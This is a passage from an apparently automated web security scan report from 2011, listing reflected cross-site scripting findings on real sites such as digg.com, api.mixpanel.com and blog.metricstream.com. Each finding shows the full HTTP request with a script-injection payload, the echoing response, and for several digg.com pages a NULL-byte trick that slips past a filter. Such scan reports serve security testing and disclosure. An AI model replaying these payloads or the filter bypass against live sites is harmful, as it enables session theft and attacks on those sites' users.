Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:37 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 384
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 was not found on this server.</p>
...[SNIP]...

2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 862c4<script>alert(1)</script>f0820835d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:19:38 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com&862c4<script>alert(1)</script>f0820835d7e=1 was not found on this server.</p>
...[SNIP]...

2.9. http://adonmax.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2267d<script>alert(1)</script>65805352abf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2267d<script>alert(1)</script>65805352abf HTTP/1.1
Host: adonmax.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Wed, 06 Jul 2011 14:27:41 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 327
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico2267d<script>alert(1)</script>65805352abf was not found on this server.</p>
...[SNIP]...

2.10. http://api.mixpanel.com/track/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.mixpanel.com
Path:   /track/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f560e<script>alert(1)</script>a9d72cefb0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJtcF9wYWdlIjogImh0dHA6Ly93d3cuYmViby5jb20vIiwidG9rZW4iOiAiOTYxMTBkM2JmZGI3YmM3ZmYwYzNjM2U0MDhkMDIyMmIiLCJ0aW1lIjogMTMwOTk1MTMwNH19&ip=1&callback=mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0&_=1309951304288 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Wed, 06 Jul 2011 11:22:10 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 68

mpmetrics.jsonp_callbackf560e<script>alert(1)</script>a9d72cefb0(1);

2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viximo.com
Path:   /api/v3/publishers/bebo.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f5abb<script>alert(1)</script>769dda3a9be was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v3/publishers/bebo.json?callback=viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be HTTP/1.1
Host: api.viximo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: application/json; charset=utf-8
Date: Wed, 06 Jul 2011 11:22:29 GMT
ETag: "71f99547f2ad6ad86b6f344aad90c979"
Server: nginx/0.7.65
Status: 200 OK
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.00955
Content-Length: 15840
Connection: keep-alive

viximo.publisherLoadedf5abb<script>alert(1)</script>769dda3a9be({body: {"publisher": {"uses_promo_bar": true, "profile_url": "http://www.bebo.com/Profile.jsp?MemberId={{user_id}}", "theme_enabled": true, "uses_gift_wrap": true, "uses_message_center": true, "offer_
...[SNIP]...

2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://blog.metricstream.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b953d'><script>alert(1)</script>19229b4da23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b953d\'><script>alert(1)</script>19229b4da23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b953d'><script>alert(1)</script>19229b4da23=1 HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32430

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>

<!-- feeds -->
<link rel="
...[SNIP]...
<a href='https://blog.metricstream.com/page/2/?b953d\'><script>alert(1)</script>19229b4da23=1' class="inactive">
...[SNIP]...

2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload da4dd<script>alert(1)</script>e5b77016dd7 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1da4dd<script>alert(1)</script>e5b77016dd7&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:15 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "169d3f95eedfc376e2b2695425fb43113203fccb"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1da4dd<script>alert(1)</script>e5b77016dd7", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);

2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload f6022<script>alert(1)</script>c416b9d548d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FwwwG2EbeautyofthewebG2EcomG2FG3FfbidG3DNOFBIDG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Bf6022<script>alert(1)</script>c416b9d548d HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Wed, 06 Jul 2011 15:39:25 GMT
Content-Type: application/javascript
Connection: close
Content-Length: 176
Etag: "fb0e3943f6866607c9d82a370bb7c2e809b158e8"

meteor.json_query_callback({"url": "http://meme.ms/nh", "id": "1", "persist": "http://meme.ms/persist?key=oqJAVXXYgcBXJagyM-pE0w"}, 0);f6022<script>alert(1)</script>c416b9d548d

2.15. http://digg.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2cec"><script>alert(1)</script>5e1f327096a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a2cec"><script>alert(1)</script>5e1f327096a=1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=2ca757a04da66628966d82294dbe49583144ee4d69a172ca708f21056e34ef90; expires=Thu, 07-Jul-2011 11:37:18 GMT; path=/; domain=digg.com
X-Digg-Time: D=251801 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101254

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg - The Latest News Headlines, Videos and Images" href="/?a2cec"><script>alert(1)</script>5e1f327096a=1.rss">
...[SNIP]...

2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00186dc"><script>alert(1)</script>11a0bd260e7 was submitted in the REST URL parameter 1. This input was echoed as 186dc"><script>alert(1)</script>11a0bd260e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=408863 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18136

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax%00186dc"><script>alert(1)</script>11a0bd260e7/submit/crawl.rss">
...[SNIP]...

2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002ad4b"><script>alert(1)</script>2bf41c450a6 was submitted in the REST URL parameter 2. This input was echoed as 2ad4b"><script>alert(1)</script>2bf41c450a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=280116 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18137

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit%002ad4b"><script>alert(1)</script>2bf41c450a6/crawl.rss">
...[SNIP]...

2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/submit/crawl

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019fdd"><script>alert(1)</script>7a8b0f85e9c was submitted in the REST URL parameter 3. This input was echoed as 19fdd"><script>alert(1)</script>7a8b0f85e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=212072 10.2.128.108
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c.rss">
...[SNIP]...

2.19. http://digg.com/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d5183"><script>alert(1)</script>fbcd4c8b309 was submitted in the REST URL parameter 1. This input was echoed as d5183"><script>alert(1)</script>fbcd4c8b309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /login%00d5183"><script>alert(1)</script>fbcd4c8b309 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=217960 10.2.129.155
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18113

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/login%00d5183"><script>alert(1)</script>fbcd4c8b309.rss">
...[SNIP]...

2.20. http://digg.com/register [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c0388"><script>alert(1)</script>65b8dbc7903 was submitted in the REST URL parameter 1. This input was echoed as c0388"><script>alert(1)</script>65b8dbc7903 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /register%00c0388"><script>alert(1)</script>65b8dbc7903 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=275292 10.2.130.111
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18119

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/register%00c0388"><script>alert(1)</script>65b8dbc7903.rss">
...[SNIP]...

2.21. http://digg.com/search [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005a216"><script>alert(1)</script>04c84f7943d was submitted in the REST URL parameter 1. This input was echoed as 5a216"><script>alert(1)</script>04c84f7943d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search%005a216"><script>alert(1)</script>04c84f7943d HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=205025 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18107

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/search%005a216"><script>alert(1)</script>04c84f7943d.rss">
...[SNIP]...

2.22. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034ebf"><script>alert(1)</script>07ed2e5f09b was submitted in the REST URL parameter 1. This input was echoed as 34ebf"><script>alert(1)</script>07ed2e5f09b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=281051 10.2.129.97
